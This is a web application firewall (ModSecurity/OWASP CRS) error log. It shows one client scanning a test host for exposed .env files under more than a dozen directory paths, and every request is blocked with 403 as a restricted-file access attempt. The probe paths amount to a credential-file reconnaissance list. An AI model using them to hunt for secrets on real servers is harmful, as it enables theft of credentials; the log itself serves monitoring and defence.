[Fri Nov 28 20:20:19.282578 2025] [:error] [pid 391534] [client 3.150.136.243:54606] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSn184XAn3U8Qs12Ils-QgAAAAw"]
[Fri Nov 28 20:20:19.282690 2025] [:error] [pid 391536] [client 3.150.136.243:54890] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSn1804qxyPu8hMP1aX-fgAAAA4"]
[Fri Nov 28 20:20:19.282871 2025] [:error] [pid 391536] [client 3.150.136.243:54890] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSn1804qxyPu8hMP1aX-fgAAAA4"]
[Fri Nov 28 20:20:19.475102 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSn18-pNjqKOvIlYLfVcWQAAAAk"]
[Fri Nov 28 20:20:19.475392 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSn18-pNjqKOvIlYLfVcWQAAAAk"]
[Fri Nov 28 20:20:19.475643 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSn18-pNjqKOvIlYLfVcWQAAAAk"]
[Fri Nov 28 20:20:20.061937 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSn19Gav54iGRrCaHjoswQAAAAQ"]
[Fri Nov 28 20:20:20.062155 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSn19Gav54iGRrCaHjoswQAAAAQ"]
[Fri Nov 28 20:20:20.062377 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSn19Gav54iGRrCaHjoswQAAAAQ"]
[Fri Nov 28 20:20:20.170719 2025] [:error] [pid 391537] [client 3.150.136.243:55194] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSn19HvPdVxAcA1b8sZ56AAAAA8"]
[Fri Nov 28 20:20:20.170986 2025] [:error] [pid 391537] [client 3.150.136.243:55194] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSn19HvPdVxAcA1b8sZ56AAAAA8"]
[Fri Nov 28 20:20:20.171181 2025] [:error] [pid 391537] [client 3.150.136.243:55194] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSn19HvPdVxAcA1b8sZ56AAAAA8"]
[Fri Nov 28 20:20:20.172352 2025] [:error] [pid 391538] [client 3.150.136.243:55430] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSn19P4TiMKhYqgXYTJBiwAAABA"]
[Fri Nov 28 20:20:20.172587 2025] [:error] [pid 391538] [client 3.150.136.243:55430] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSn19P4TiMKhYqgXYTJBiwAAABA"]
[Fri Nov 28 20:20:20.172795 2025] [:error] [pid 391538] [client 3.150.136.243:55430] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSn19P4TiMKhYqgXYTJBiwAAABA"]
[Fri Nov 28 20:20:20.295092 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSn19OlfIsf8iBzToT1BMQAAABg"]
[Fri Nov 28 20:20:20.295118 2025] [:error] [pid 391541] [client 3.150.136.243:55546] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSn19KsCtNc1QXFJ-Iu0vQAAABM"]
[Fri Nov 28 20:20:20.295307 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSn19OlfIsf8iBzToT1BMQAAABg"]
[Fri Nov 28 20:20:20.295336 2025] [:error] [pid 391541] [client 3.150.136.243:55546] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSn19KsCtNc1QXFJ-Iu0vQAAABM"]
[Fri Nov 28 20:20:20.295483 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSn19OlfIsf8iBzToT1BMQAAABg"]
[Fri Nov 28 20:20:20.295544 2025] [:error] [pid 391541] [client 3.150.136.243:55546] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSn19KsCtNc1QXFJ-Iu0vQAAABM"]
[Fri Nov 28 20:20:20.919156 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSn19OpNjqKOvIlYLfVcWgAAAAk"]
[Fri Nov 28 20:20:20.919374 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSn19OpNjqKOvIlYLfVcWgAAAAk"]
[Fri Nov 28 20:20:20.919590 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSn19OpNjqKOvIlYLfVcWgAAAAk"]
[Fri Nov 28 20:20:21.044070 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSn19Wav54iGRrCaHjoswgAAAAQ"]
[Fri Nov 28 20:20:21.044295 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSn19Wav54iGRrCaHjoswgAAAAQ"]
[Fri Nov 28 20:20:21.044480 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSn19Wav54iGRrCaHjoswgAAAAQ"]
[Fri Nov 28 20:20:22.577397 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSn19ulfIsf8iBzToT1BNAAAABg"]
[Fri Nov 28 20:20:22.577624 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSn19ulfIsf8iBzToT1BNAAAABg"]
[Fri Nov 28 20:20:22.577816 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSn19ulfIsf8iBzToT1BNAAAABg"]
[Fri Nov 28 20:20:22.890371 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSn19mav54iGRrCaHjosxAAAAAQ"]
[Fri Nov 28 20:20:22.890632 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSn19mav54iGRrCaHjosxAAAAAQ"]
[Fri Nov 28 20:20:22.890823 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSn19mav54iGRrCaHjosxAAAAAQ"]
[Fri Nov 28 20:20:22.891688 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSn19ulfIsf8iBzToT1BNQAAABg"]
[Fri Nov 28 20:20:22.891878 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSn19ulfIsf8iBzToT1BNQAAABg"]
[Fri Nov 28 20:20:22.892040 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSn19ulfIsf8iBzToT1BNQAAABg"]
[Fri Nov 28 20:20:23.198080 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSn19-lfIsf8iBzToT1BNgAAABg"]
[Fri Nov 28 20:20:23.198296 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSn19-lfIsf8iBzToT1BNgAAABg"]
[Fri Nov 28 20:20:23.198516 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSn19-lfIsf8iBzToT1BNgAAABg"]
[Fri Nov 28 20:20:23.403686 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSn192av54iGRrCaHjosxQAAAAQ"]
[Fri Nov 28 20:20:23.403921 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSn192av54iGRrCaHjosxQAAAAQ"]
